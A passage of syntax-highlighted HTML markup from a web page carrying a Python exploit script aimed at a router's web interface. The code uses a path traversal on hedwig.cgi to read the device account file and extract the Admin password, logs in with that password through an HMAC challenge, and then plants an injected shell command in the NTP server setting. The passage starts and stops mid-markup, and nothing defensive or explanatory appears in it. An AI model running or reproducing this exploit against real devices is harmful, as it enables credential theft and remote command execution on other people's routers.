class=\"crayon-s\">&lt;postxml&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-44\"><span class=\"crayon-s\">&lt;module&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-45\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&lt;service&gt;..\/..\/..\/htdocs\/webinc\/getcfg\/DEVICE.ACCOUNT.xml&lt;\/service&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-46\"><span class=\"crayon-s\">&lt;\/module&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-47\"><span class=\"crayon-s\">&lt;\/postxml&gt;&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-48\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-49\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/hedwig.cgi&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-50\"><span class=\"crayon-p\"># print(resp.text)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-51\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-52\"><span class=\"crayon-p\"># getcfg: &lt;module&gt;&#8230;&lt;\/module&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-53\"><span class=\"crayon-p\"># hedwig: <span class=\"crayon-ta\">&lt;?<\/span><span class=\"crayon-e\">xml <\/span><span class=\"crayon-i\">version<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1.0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">encoding<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;utf-8&#8221;<\/span><span class=\"crayon-ta\">?&gt;<\/span><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-54\"><span class=\"crayon-p\">#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : &lt;hedwig&gt;&#8230;&lt;\/hedwig&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-55\"><span class=\"crayon-v\">accdata<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">find<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;?xml&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-56\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-57\"><span class=\"crayon-v\">admin_pasw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-58\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-59\"><span class=\"crayon-v\">tree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">accdata<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-60\"><span class=\"crayon-v\">accounts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/module\/device\/account\/entry&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-61\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">acc <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">accounts<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">acc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">findtext<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pasw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">acc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">findtext<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;password&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;name:&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;pass:&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pasw<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Admin&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">admin_pasw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pasw<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-68\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-69\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">admin_pasw<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Admin password not found!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-72\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-73\"><span class=\"crayon-p\">############################################################<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-74\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-75\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Auth challenge&#8230;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-76\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/authentication.cgi&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-77\"><span class=\"crayon-p\"># print(resp.text)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-78\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-79\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">json<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">loads<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-80\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;status&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">lower<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ok&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Failed!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-84\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-85\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;uid:&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;uid&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-86\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;challenge:&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;challenge&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-87\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-88\"><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">update<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;uid&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;uid&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-89\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-90\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Auth login&#8230;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-91\"><span class=\"crayon-v\">user_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Admin&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-92\"><span class=\"crayon-v\">user_pasw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">admin_pasw<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-93\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-94\"><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;id&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_name<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;password&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hmac<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">user_pasw<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">user_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;challenge&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;md5&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">hexdigest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">upper<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-97\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-98\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/authentication.cgi&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-99\"><span class=\"crayon-p\"># print(resp.text)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-100\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-101\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">json<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">loads<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-102\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;status&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">lower<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ok&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-103\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Failed!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-106\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;OK&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-107\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-108\"><span class=\"crayon-p\">############################################################<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-109\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-110\"><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;SERVICES&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;DEVICE.TIME&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-111\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/getcfg.php&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-112\"><span class=\"crayon-p\"># print(resp.text)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-113\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-114\"><span class=\"crayon-v\">tree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-115\"><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/\/ntp\/enable&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-116\"><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/\/ntp\/server&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;metelesku; (&#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">COMMAND<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;) &amp; exit; &#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-117\"><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/\/ntp6\/enable&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-118\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-119\"><span class=\"crayon-p\">############################################################<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-120\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-121\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;hedwig&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 